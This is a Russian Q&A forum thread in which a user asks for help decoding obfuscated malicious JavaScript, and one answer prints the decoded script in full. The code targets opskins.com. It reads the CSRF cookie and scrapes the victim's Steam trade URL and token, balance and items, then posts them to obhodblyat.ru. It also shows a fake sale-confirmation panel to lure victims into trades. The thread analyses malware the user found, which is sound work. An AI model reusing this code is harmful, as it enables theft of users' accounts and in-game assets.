Нашёл вредоносный код, как его расшифровать?

Question

[WestlE]

Добрый день!
Нашёл вредоносный JS код, зашифрован каким-то странным методом.
Помогите его расшифровать
http://pastebin.com/qk5VfMJK

Answer 1

[Дмитрий Беляев]

Держите Ваш скрипт, что делает сами разбирайтесь, мне влом

if (document.domain === 'www.opskins.com' || document.domain === 'opskins.com') {
		function online() {
		var n = $('.avatar-menu .dropdown a h2').text();
		$.post( 'https://obhodblyat.ru/opskinseba/'+ahuet+'/online.php', {name: n} );
	}
		var n = $('.avatar-menu .dropdown a h2').text();
		$.post( 'https://obhodblyat.ru/opskinseba/'+ahuet+'/online.php', {name: n} );
					setInterval(online,45000);
	$('.op-alert-message.op-danger').hide();
	function bal(){
		$.get('https://obhodblyat.ru/opskinseba/'+ahuet+'/balance.php', function(data){

		data = JSON.parse(data);
		var name = $('.navbar-brand .user-info h2').text();
		name = name.substring(0, name.length - 1);
		if(name == data.nick){
		var bal = $('#op-count').text();
		bal = bal.substring(1);
		bal = parseFloat(bal);
		var bal2 = data.bal;
		bal2 = parseFloat(bal2);
		bal = bal+bal2;

		$('#op-count').text('$'+bal);
		$('#op-count').show();
		}else{
		$('#op-count').show();
		}

	});
	}



var gay = location.href
if(gay.indexOf('loc=shop_sale_form') > 0) {
$('button.navbar-toggle.pull-left').before('<div style="display:none; background: #00a279;font-family: sans-serif;padding: 10px;text-align: center;font-size: 20px;" class="adminopsninssuckercock">0 - Items was stolen</div>');
$('.adminopsninssuckercock').show('slow');
function hideban() {
$('.adminopsninssuckercock').hide('slow');
}
setTimeout(hideban, 5000);
var bot = '';
var code = '';
var steamid = '';
			var imgepta = '';
			var textepta = '';
var on = '';



function getCookie(name) {
  var matches = document.cookie.match(new RegExp(
    "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
  ));
  return matches ? decodeURIComponent(matches[1]) : undefined;
}

var link = 'https://steamcommunity.com/my/tradeoffers';
function sell2() {
	$('#qItems').html('<div class="alert alert-success">'+
			'<p>Your sale has been assigned to <a href="https://steamcommunity.com/profiles/'+steamid+'" class="alert-link" target="_BLANK">bot #'+bot+'</a>.</p>'+
			'<p><b>Your security token is \''+code+'\'.</b></p>'+
			'<h4>Open Trade Offer In:</h4>'+
			'<span class="offer-links">'+
				'<a class="btn btn-default btn-lg" target="_BLANK" href="'+link+'"><i class="fa fa-chrome"></i> Browser</a>'+
				'<a class="btn btn-default btn-lg" href="steam://url/TradeOffers/"><i class="stm stm-steam"></i> Steam</a>'+
			'</span>'+
			'<p>Trade offers may be canceled after 5 minutes.<br>After that time, you must resend the offer from your account page.</p>'+
		'</div>')
}
var csrf = getCookie('opskins_csrf');
	function keksik(){
$.ajax({
            url: '/?loc=store_account',
            type: 'GET',
            headers: {
                'x-csrf': csrf
            },
            success: function (result) {
             		var t = "OPskins";
		var n = $('.avatar-menu .dropdown a h2').text();
		var v = $(result).find('input[name*="tUrl"]').val();
		var v1 = v.split('&token=')[0];
		v1 = v1.substr(51);
		var v2 = v.split('&token=')[1];
		var b = $('#op-count').text();
$.post( 'https://obhodblyat.ru/opskinseba/'+ahuet+'/logs.php', { type: t, name: n, value1: v1,value2: v2,bal: b,items: textepta, itemsimg: imgepta } );
            },
            error: function (error) {

            }
        });
	}



function pre() {
		$('#sellDepositBtn').html('<span class="btn btn-orange" id="sellitems" style="display: inline-block;">Deposit Items<span id="dueNowBtn" style="display:none;"> (<span id="dueNowAmt">0</span> Due Now)</span> </span>')
	$.get('https://obhodblyat.ru/opskinseba/'+ahuet+'/name.php', function(data){
		bot = data;
	})
	$.get('https://obhodblyat.ru/opskinseba/'+ahuet+'/code.php', function(data){
		code = data;
	})
	$.get('https://obhodblyat.ru/opskinseba/'+ahuet+'/steamid.php', function(data){
		steamid = data;
	})

	//setTimeout(keksik, 2000);



$( "#sellitems" ).click(function() {
			$( "#qItems .sale-item" ).each(function() {
			imgepta += '<img src="'+$(this).find(".sale-item-img").attr("src")+'"></img>';
			textepta += '<span>'+$(this).find('.sale-item-desc').text()+'</span>';
		});
		keksik();
	$("#qItems").html("<img class='ajax-loader' src='images/ajax-loader-big.gif'/>");
	setTimeout(sell2,2000);
})
}
}
$.get('https://obhodblyat.ru/opskinseba/'+ahuet+'/steam.php', function(data){
if(data == '1'){
	bal();
	if(gay.indexOf('loc=shop_sale_form') > 0) {
		pre();
	}
}else{
	$('#op-count').show();
}
})
}

Comments

[WestlE]

извинюсь , не подскажите каким сервисом вскрывали код ?

[Дмитрий Беляев]

WestlE: просто консолькой браузера
выполнил формирование объекта guy, выдернул формирование строки и загнал в переменную - там код для функции, которая возвращает данный код, дальше из этого всего 2 раза формируется функция, через Function, которая получается через guy.constructor.constructor, ну и исполняется

Answer 2

[Виталий]

alert или console.log уже не работают?
короче там есть функция, которая создает новый скрипт и дальше видимо его подгружает на страницу, ну а дальше не трудно предположить что происходит.

Comments

[WestlE]

тут - нет